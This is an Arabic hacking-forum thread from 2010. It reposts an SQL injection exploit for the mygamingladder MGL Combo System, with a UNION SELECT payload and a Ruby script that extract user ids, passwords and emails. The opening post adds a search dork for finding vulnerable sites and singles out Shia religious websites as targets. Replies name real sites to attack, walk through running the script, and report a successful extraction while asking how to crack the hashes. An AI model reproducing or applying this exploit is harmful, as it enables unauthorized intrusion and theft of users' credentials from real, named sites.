التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 04-11-2010, 12:09 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Marine
Love Me
 
الصورة الرمزية Marine
 

 

 
إحصائية العضو





Marine غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Marine is on a distinguished road

افتراضي سكربت mygamingladder MGL Combo System مصاب مواقع شيعيه كثيره


كود PHP:
# Title: mygamingladder MGL Combo System <= 7.5 SQL injection
# EDB-ID: 12135
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Easy Laster
# Published: 2010-04-10
# Verified: no
# Download Exploit Code
# Download N/A

view source
print?
----------------------------
Information------------------------------------------------
+
Name mygamingladder MGL Combo System <= 7.5 SQL injection Vulnerability SQL injection Exploit
+Autor Easy Laster
+Date   10.04.2010
+Script  mygamingladder MGL Combo System <= 7.5
+Download : ------------------
+
Demo http://www.mygamingladder.com/upgrade/combo/
+Price 120$
+
Language PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project 4004-security-project.com
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101.
 
---------------------------------------------------------------------------------------
                                                                                      
 
___ ___ ___ ___                         _ _           _____           _         _  
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|-| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |
_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_
                                              |
___|                 |___|           
 
 
----------------------------------------------------------------------------------------
+
Vulnerability http://www.site.com/game/news.php?newsid=
 
 
+Exploitable   http://www.site.com/game/news.php?newsid=1'/**/UNION/**/SELECT+1,
concat(id,0x3a,pass,0x3a,email),3,4/**/from/**/users/**/WHERE/**/id=1--+
 
 
-----------------------------------------------------------------------------------------
 
#Exploit
 
#!/usr/bin/ruby
#4004-security-project.com
#Discovered and vulnerability by Easy Laster
print "
#########################################################
#            4004-Security-Project                      #
#########################################################
#             mygamingladder MGL Combo System 7.5       #
#                          Exploit                      #
#                     Using Host+Path                   #
#                     www.demo.de /forum/               #
#                         Easy Laster                   #
#########################################################
"
require 'net/http'
print "#########################################################"
print "\nEnter host name (site.com)->"
host=gets.chomp
print "#########################################################"
print "\nEnter script path (/forum/)->"
path=gets.chomp
print "\n#########################################################"
begin
dir 
"news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"
http Net::HTTP.new(host80)
resphttp.get(path+dir)
print 
"\nid -> "+(/#####(.+)#####/).match(resp.body)[1]
dir "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,pass,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"
http Net::HTTP.new(host80)
resphttp.get(path+dir)
print 
"\npassword -> "+(/#####(.+)#####/).match(resp.body)[1]
dir "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+"
http Net::HTTP.new(host80)
resphttp.get(path+dir)
print 
"\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]
print "\n#########################################################"
rescue
print "\nExploit failed"
end 

الدورك

كود:
inurl:news.php?newsid=
لا وصيكم بالتنتيف

مواقع شيعيه حسينيه مركبته كثيير

تحياتي يزيد العتيبي


s;vfj mygamingladder MGL Combo System lwhf l,hru adudi ;edvi

التوقيع

ذكرآكم في قلبي ماحييت

 

   

رد مع اقتباس
قديم 04-11-2010, 12:28 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية MOON14
 

 

 
إحصائية العضو





MOON14 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MOON14 is on a distinguished road

افتراضي


أخوي طبق لنا على موقع لأني جربت على مواقع كثيرة ما نجحت
ولك جزيل الشكر

   

رد مع اقتباس
قديم 04-11-2010, 12:30 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
Marine
Love Me
 
الصورة الرمزية Marine
 

 

 
إحصائية العضو





Marine غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Marine is on a distinguished road

افتراضي


لا تحط الاستغلال الموجود حاول انك تكتبه يدوي

التوقيع

ذكرآكم في قلبي ماحييت

 

   

رد مع اقتباس
قديم 04-11-2010, 12:30 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية MOON14
 

 

 
إحصائية العضو





MOON14 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MOON14 is on a distinguished road

افتراضي


طبق على هذا
http://www.noaim.net/news.php?newsid=1909
جريت ما نجح
وشكرا

   

رد مع اقتباس
قديم 04-11-2010, 12:31 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية MOON14
 

 

 
إحصائية العضو





MOON14 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MOON14 is on a distinguished road

افتراضي


كتيت ما نجح أخوي
ممكن تكتبه لنا من جديد

   

رد مع اقتباس
قديم 04-11-2010, 12:36 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
Marine
Love Me
 
الصورة الرمزية Marine
 

 

 
إحصائية العضو





Marine غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Marine is on a distinguished road

افتراضي


مصاب

http://www.noaim.net/news.php?newsid=1909'

جرب خش ورح تشوف ذ

التوقيع

ذكرآكم في قلبي ماحييت

 

   

رد مع اقتباس
قديم 04-11-2010, 12:39 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية MOON14
 

 

 
إحصائية العضو





MOON14 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MOON14 is on a distinguished road

افتراضي


http://www.noaim.net/news.php?newsid...ERE/**/id=1--+

ما ظهر شيئ أخوي شوفي لي حل

   

رد مع اقتباس
قديم 04-11-2010, 12:49 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية MOON14
 

 

 
إحصائية العضو





MOON14 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MOON14 is on a distinguished road

افتراضي


أخوي عططني موقع أنت طبقت عليه ونجح
خلينا نشوف كيف الحقنة تنكتب
شكرا

   

رد مع اقتباس
قديم 04-11-2010, 05:31 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية ehabamr
 

 

 
إحصائية العضو





ehabamr غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ehabamr is on a distinguished road

افتراضي


مشكور يايزيد

   

رد مع اقتباس
قديم 04-11-2010, 05:41 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
Marine
Love Me
 
الصورة الرمزية Marine
 

 

 
إحصائية العضو





Marine غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Marine is on a distinguished road

افتراضي


ياقمر احقن انت

http://www.abather.net/news.php?newsid=1041

ايهاب منور الموضوع

التوقيع

ذكرآكم في قلبي ماحييت

 

   

رد مع اقتباس
قديم 04-11-2010, 06:06 AM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية ehabamr
 

 

 
إحصائية العضو





ehabamr غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ehabamr is on a distinguished road

افتراضي


اخى الكريم يزيد اولا الف شكر على المجهود

ثانيا ارجو منك ان تشرح لى كيف استطيع استخدام الثغره

استخدام صحيح واعتذر ان كنت سوف ااخذ من وقتك ولكن ارجو المعذره

لتعم الفائده على الجميع

اشكرك مره اخرى

ايهاب

   

رد مع اقتباس
قديم 04-11-2010, 07:55 AM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية H3x HaCkeR
 

 

 
إحصائية العضو





H3x HaCkeR غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
H3x HaCkeR is on a distinguished road

افتراضي


[align=center]^

لازم تسسطب برنامج ترجمة لغة الربي ruby بعدها خش للدوس

\cd

وبعدها

cd ruby

الحين بتخش على مجلد الربي ruby

اجفظ الثغرة بامتداد rb ونسميها vbspiders

نكتب

ruby vbspiders.rb

انتر والسلام عليكم

وتمت الترجمة :$[/align]

التوقيع

H3xr00ted Evry THING

:a06:

 

   

رد مع اقتباس
قديم 04-11-2010, 08:10 AM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية ehabamr
 

 

 
إحصائية العضو





ehabamr غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ehabamr is on a distinguished road

افتراضي


اخى الكريم انا فعلا عملت كده والنتيجه كانت

#
################################################## #######
# mygamingladder MGL Combo System 7.5 #
# Exploit #
# Using Host+Path #
# www.demo.de /forum/ #
# Easy Laster #
################################################## #######


صح اريد التطبيق

Using Host+Path
www.demo.de /forum/
#

   

رد مع اقتباس
قديم 04-11-2010, 02:18 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
Marine
Love Me
 
الصورة الرمزية Marine
 

 

 
إحصائية العضو





Marine غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Marine is on a distinguished road

افتراضي


ماقصر معك الاخ

تحط البيانات هنا

حقت الموقع




Using Host+Path
www.demo.de /forum/
#

التوقيع

ذكرآكم في قلبي ماحييت

 

   

رد مع اقتباس
قديم 04-12-2010, 04:48 AM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية Art design
 

 

 
إحصائية العضو








Art design غير متواجد حالياً

إرسال رسالة عبر Skype إلى Art design

 

 

إحصائية الترشيح

عدد النقاط : 10
Art design is on a distinguished road

افتراضي


نجح 100% بارك الله فيك لكن يوجد مشكل الباس المشفر ممكن موقع معتمد ؟؟

التوقيع

[align=center]جزائري و كلنا مع فلسطين ضالمة أو مضلومة كما قال الزعيم الراحل رحمه الله هواري بومدين [/align]

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
كما وعدتكم موسوعه كبيره لاميلات كثيره هديه لعيونكم KOOBAN Hackers Showoff 78 10-08-2010 05:58 PM
مواقع كثيره للمبتدئين للتدرب ^_* GoLdeN-z3r0 SQL قواعد البيانات 8 08-22-2010 01:17 AM
على الجميع المبادره لقصف هذه المواقع واكمال الحقن مواقع كبيره ومشهوره NEVER HaCKEr SQL قواعد البيانات 5 11-23-2009 07:04 PM


الساعة الآن 11:37 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0